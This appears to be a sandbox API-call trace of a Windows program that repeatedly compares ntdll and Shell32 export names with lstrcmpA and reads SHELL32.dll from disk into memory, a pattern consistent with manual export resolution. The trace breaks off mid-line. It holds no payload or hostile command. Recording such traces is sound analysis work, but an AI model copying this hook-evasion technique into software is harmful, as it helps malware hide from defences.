lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.705] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.706] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0117.706] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.706] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.706] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.707] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0117.707] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.707] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0117.707] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0117.707] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0117.707] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.708] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0117.708] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0117.708] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0117.708] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0117.708] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.708] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0117.709] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.709] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0117.710] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0122.858] GetProcessHeap () returned 0x460000 [0122.858] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4073040 | out: hHeap=0x460000) returned 1 [0122.874] GetProcessHeap () returned 0x460000 [0122.874] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479290 [0122.875] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0122.875] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0122.875] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0122.875] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0122.876] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0122.877] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0122.877] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0122.877] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0122.877] GetProcessHeap () returned 0x460000 [0122.877] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1587258) returned 0x407a040 [0123.385] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0123.385] ReadFile (in: hFile=0x140, lpBuffer=0x407a040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x407a040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0130.165] CloseHandle (hObject=0x140) returned 1 [0130.166] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0130.166] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0130.166] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0130.167] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0130.167] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0130.167] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0130.167] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0130.167] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0130.167] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.167] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0130.167] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0130.167] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0130.167] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.167] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0130.167] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0130.167] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0130.167] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0130.167] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.167] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0130.168] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.168] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.168] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0130.168] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0130.168] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0130.169] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0130.169] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0130.170] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.170] lstrcmpA 